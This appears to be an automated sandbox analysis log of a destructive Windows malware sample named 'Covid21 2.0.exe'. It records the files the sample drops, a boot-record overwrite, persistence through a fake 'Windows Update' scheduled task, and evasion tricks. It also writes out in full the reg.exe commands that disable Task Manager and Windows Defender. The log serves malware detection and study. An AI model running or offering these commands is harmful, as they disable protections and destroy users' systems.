Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exe mlt.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe icons.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe screenscrew.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\t.vbs'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe PayloadMBR.exe
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /TN 'Windows Update' /ru SYSTEM /SC ONSTART /TR 'C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe'
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Covid21 2.0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\wscript.exe Automated click: OK
Source: C:\Windows\SysWOW64\timeout.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Covid21 2.0.exe Static file information: File size 1210880 > 1048576
Source: C:\Users\user\Desktop\Covid21 2.0.exe Code function: 0_2_00405EB2 GetTempPathA,LoadLibraryA,GetProcAddress,GetLongPathNameA,FreeLibrary,0_2_00405EB2
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior:

Command shell drops VBS files
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\2526.tmp\x.vbs
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\2526.tmp\t.vbs
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Writes directly to the primary disk partition (DR0)
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe File written: \Device\Harddisk0\DR0 offset: unknown length: 12288
Source: C:\Users\user\Desktop\Covid21 2.0.exe File created: C:\Users\user\AppData\Local\Temp\2526.tmp\Corona.exe
Source: C:\Users\user\Desktop\Covid21 2.0.exe File created: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exe
Source: C:\Users\user\Desktop\Covid21 2.0.exe File created: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe
Source: C:\Users\user\Desktop\Covid21 2.0.exe File created: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe
Source: C:\Users\user\Desktop\Covid21 2.0.exe File created: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe
Source: C:\Users\user\Desktop\Covid21 2.0.exe File created: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe
Source: C:\Users\user\Desktop\Covid21 2.0.exe File created: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\covid21\Corona.exe
Source: C:\Users\user\Desktop\Covid21 2.0.exe File created: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /TN 'Windows Update' /ru SYSTEM /SC ONSTART /TR 'C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe'
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe Code function: 6_2_004554C4 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,6_2_004554C4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe Code function: 6_2_00452098 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,6_2_00452098
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe Code function: 6_2_0043AB48 IsIconic,GetCapture,6_2_0043AB48
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe Code function: 6_2_0043B440 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,6_2_0043B440
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe Code function: 6_2_00425458 IsIconic,GetWindowPlacement,GetWindowRect,6_2_00425458
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe Code function: 6_2_00455BEC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,6_2_00455BEC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe Code function: 6_2_00455CB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,6_2_00455CB0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe Code function: 6_2_0043BD64 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,6_2_0043BD64
Source: C:\covid21\Corona.exe Code function: 12_2_0044CF30 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,12_2_0044CF30
Source: C:\covid21\Corona.exe Code function: 12_2_00449F58 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,12_2_00449F58
Source: C:\covid21\Corona.exe Code function: 12_2_0043402C IsIconic,GetCapture,12_2_0043402C
Source: C:\covid21\Corona.exe Code function: 12_2_004348E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,12_2_004348E0
Source: C:\covid21\Corona.exe Code function: 12_2_00435160 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,12_2_00435160
Source: C:\covid21\Corona.exe Code function: 12_2_0044D650 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,12_2_0044D650
Source: C:\covid21\Corona.exe Code function: 12_2_0044D700 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,12_2_0044D700
Source: C:\covid21\Corona.exe Code function: 12_2_0042397C MonitorFromWindow,MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,12_2_0042397C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe Code function: 13_2_0044A498 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,13_2_0044A498
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe Code function: 13_2_00432810 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,13_2_00432810
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe Code function: 13_2_0044ABB8 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,13_2_0044ABB8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe Code function: 13_2_0044AC68 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,13_2_0044AC68
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe Code function: 13_2_004474C0 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,13_2_004474C0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe Code function: 13_2_004316DC IsIconic,GetCapture,13_2_004316DC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe Code function: 13_2_00421D38 IsIconic,GetWindowPlacement,GetWindowRect,13_2_00421D38
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe Code function: 13_2_00431F90 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,13_2_00431F90
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_0043A0D6 GetForegroundWindow,IsWindowVisible,GetWindowThreadProcessId,IsZoomed,IsIconic,GetWindowLongA,GetModuleHandleA,GetProcAddress,18_2_0043A0D6
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_004360F9 SetWindowTextA,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongA,GetWindowLongA,GetWindowRect,MapWindowPoints,GetWindowLongA,GetWindowRect,GetWindowLongA,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongA,GetMenu,GetWindowLongA,AdjustWindowRectEx,SystemParametersInfoA,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetForegroundWindow,GetFocus,UpdateWindow,SetFocus,18_2_004360F9
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_0043536F GetWindowLongA,GetWindowLongA,GetWindowLongA,_strlen,SetWindowPos,EnableWindow,IsWindowVisible,IsIconic,SetWindowLongA,SetWindowLongA,SetWindowLongA,SetWindowPos,ShowWindow,ShowWindow,ShowWindow,18_2_0043536F
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_0043C3F2 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,FindWindowA,IsIconic,ShowWindow,AttachThreadInput,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,18_2_0043C3F2
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_00439C0E GetAsyncKeyState,GetForegroundWindow,IsIconic,GetWindowRect,18_2_00439C0E
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_0044C66D SendMessageA,SendMessageA,SendMessageA,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageA,18_2_0044C66D
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_00431E81 SendMessageA,GetWindowLongA,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,SendMessageA,GetWindowLongA,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,PtInRect,SetFocus,SendMessageA,SetFocus,MapWindowPoints,InvalidateRect,18_2_00431E81
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_0042CF3C GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,DrawTextA,GetSystemMetrics,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,IsWindowVisible,IsIconic,SendMessageA,GetWindowLongA,SendMessageA,CreateWindowExA,SetWindowLongA,SendMessageA,CreateWindowExA,GetWindowLongA,SendMessageA,SendMessageA,CreateWindowExA,CreateWindowExA,CreateWindowExA,SendMessageA,SendMessageA,CreateWindowExA,SendMessageA,SendMessageA,SendMessageA,GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageA,SelectObject,ReleaseDC,SendMessageA,SendMessageA,GetClientRect,SetWindowLongA,SendMessageA,SetWindowLongA,MoveWindow,GetWindowRect,SendMessageA,SetWindowPos,GetWindowRect,MapWindowPoints,InvalidateRect,SetWindowPos,SetWindowPos,18_2_0042CF3C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe Code function: 30_2_00428FE4 PostMessageA,PostMessageA,SendMessageA,LoadLibraryA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,30_2_00428FE4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe Code function: 30_2_0041F210 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,30_2_0041F210
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe Code function: 30_2_0041E320 IsIconic,GetCapture,30_2_0041E320
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe Code function: 30_2_0041EABA IsIconic,SetWindowPos,30_2_0041EABA
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe Code function: 30_2_0041EABC IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,30_2_0041EABC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe Code function: 30_2_004275F8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,30_2_004275F8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe Code function: 30_2_00429678 IsIconic,SetActiveWindow,30_2_00429678
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe Code function: 30_2_004296C0 IsIconic,SetActiveWindow,SetFocus,30_2_004296C0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe Code function: 6_2_00440A48 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,6_2_00440A48
Source: C:\Windows\SysWOW64\cmd.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Covid21 2.0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\covid21\Corona.exe Code function: 12_2_004294BC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe Code function: 13_2_00426D20
Source: C:\Windows\SysWOW64\cmd.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,6_2_0045478C
Source: C:\covid21\Corona.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,12_2_0044C4A0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,13_2_00449A08
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,30_2_00428764
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\Covid21 2.0.exe Window / User API: threadDelayed 1518
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe API coverage: 8.1 %
Source: C:\covid21\Corona.exe API coverage: 7.1 %
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe API coverage: 4.1 %
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe API coverage: 2.9 %
Source: C:\Users\user\Desktop\Covid21 2.0.exe TID: 6568 Thread sleep count: 1518 > 30
Source: C:\Users\user\Desktop\Covid21 2.0.exe TID: 6568 Thread sleep time: -37950s >= -30000s
Source: C:\Windows\System32\conhost.exe TID: 6664 Thread sleep count: 111 > 30
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe TID: 7096 Thread sleep time: -46000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 7124 Thread sleep count: 42 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6428 Thread sleep count: 41 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6844 Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe TID: 6048 Thread sleep count: 281 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7056 Thread sleep count: 43 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5660 Thread sleep count: 42 > 30
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Covid21 2.0.exe Thread sleep count: Count: 1518 delay: -25
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe Code function: 6_2_0040850C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,6_2_0040850C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe Code function: 6_2_00408604 FindFirstFileA,GetLastError,6_2_00408604
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe Code function: 6_2_00405210 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_00405210
Source: C:\covid21\Corona.exe Code function: 12_2_00404F24 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00404F24
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe Code function: 13_2_00404EB8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,13_2_00404EB8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_0043892A _strlen,FindFirstFileA,FindFirstFileA,FindClose,FindFirstFileA,FindClose,_strcat,18_2_0043892A
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_00424873 _strlen,_strcat,_strcat,_strrchr,_strlen,_strrchr,FindFirstFileA,FindFirstFileA,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,SetFileAttributesA,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,FindNextFileA,FindClose,18_2_00424873
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_00423AD5 DeleteFileA,FindFirstFileA,_strcat,_strrchr,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,DeleteFileA,FindNextFileA,FindClose,18_2_00423AD5
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_0040A357 _strrchr,_strcat,_strlen,_strcat,FindFirstFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,_strlen,FindNextFileA,FindClose,18_2_0040A357
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_0042C368 FindFirstFileA,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,MoveFileA,DeleteFileA,MoveFileA,CopyFileA,FindNextFileA,FindClose,18_2_0042C368
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe Code function: 18_2_00423D09 FindFirstFileA,FindClose,18_2_00423D09
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00423DE4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,18_2_00423DE4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00424DBB _strlen,_strcat,LocalFileTimeToFileTime,GetSystemTimeAsFileTime,_strcat,_strrchr,_strlen,_strrchr,FindFirstFileA,FindFirstFileA,SetFileTime,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,CreateFileA,SetFileTime,CloseHandle,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,FindNextFileA,FindClose,18_2_00424DBB
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042C603 GetFileAttributesA,FindFirstFileA,FindClose,18_2_0042C603
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00439FDC FindFirstFileA,FindClose,GetFileAttributesA,18_2_00439FDC
Source: C:\covid21\Corona.exeCode function: 12_2_0041DBAC GetSystemInfo,12_2_0041DBAC
Source: reg.exe, 00000004.00000002.650947885.0000000003800000.00000002.00000001.sdmp, reg.exe, 00000005.00000002.652831555.0000000002F80000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.662228048.0000000002AA0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: reg.exe, 00000004.00000002.650947885.0000000003800000.00000002.00000001.sdmp, reg.exe, 00000005.00000002.652831555.0000000002F80000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.662228048.0000000002AA0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: reg.exe, 00000004.00000002.650947885.0000000003800000.00000002.00000001.sdmp, reg.exe, 00000005.00000002.652831555.0000000002F80000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.662228048.0000000002AA0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Covid21 2.0.exe, 00000000.00000002.754672702.000000000092B000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Covid21 2.0.exe, 00000000.00000002.754672702.000000000092B000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy
Source: reg.exe, 00000004.00000002.650947885.0000000003800000.00000002.00000001.sdmp, reg.exe, 00000005.00000002.652831555.0000000002F80000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.662228048.0000000002AA0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeProcess information queried: ProcessInformation

Anti Debugging:

Found API chain indicative of debugger detection
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exe Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Covid21 2.0.exe Code function: 0_2_00405EB2 GetTempPathA,LoadLibraryA,GetProcAddress,GetLongPathNameA,FreeLibrary,0_2_00405EB2
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00403B70 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,0_2_00403B70
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00403CC0 SetUnhandledExceptionFilter,0_2_00403CC0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exeCode function: 23_2_004011B0 Sleep,Sleep,SetUnhandledExceptionFilter,GetStartupInfoA,23_2_004011B0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exeCode function: 23_2_00402C58 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,Sleep,TlsGetValue,23_2_00402C58
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exeCode function: 23_2_00402290 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00402290
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeCode function: 27_2_00401179 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,27_2_00401179
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeCode function: 27_2_0040201C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,27_2_0040201C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeCode function: 27_2_00402020 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,27_2_00402020
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0040EFDE _strlen,_strcat,_strlen,_strcat,CreateProcessA,CloseHandle,_strcat,ShellExecuteExA,CloseHandle,_strlen,_strlen,18_2_0040EFDE
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_004132DA keybd_event,VkKeyScanExA,18_2_004132DA
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0041380D mouse_event,18_2_0041380D
Source: C:\Users\user\Desktop\Covid21 2.0.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2526.tmp\Covid21.bat' '
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript prompt.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe clwcp c:\covid21\covid.jpg
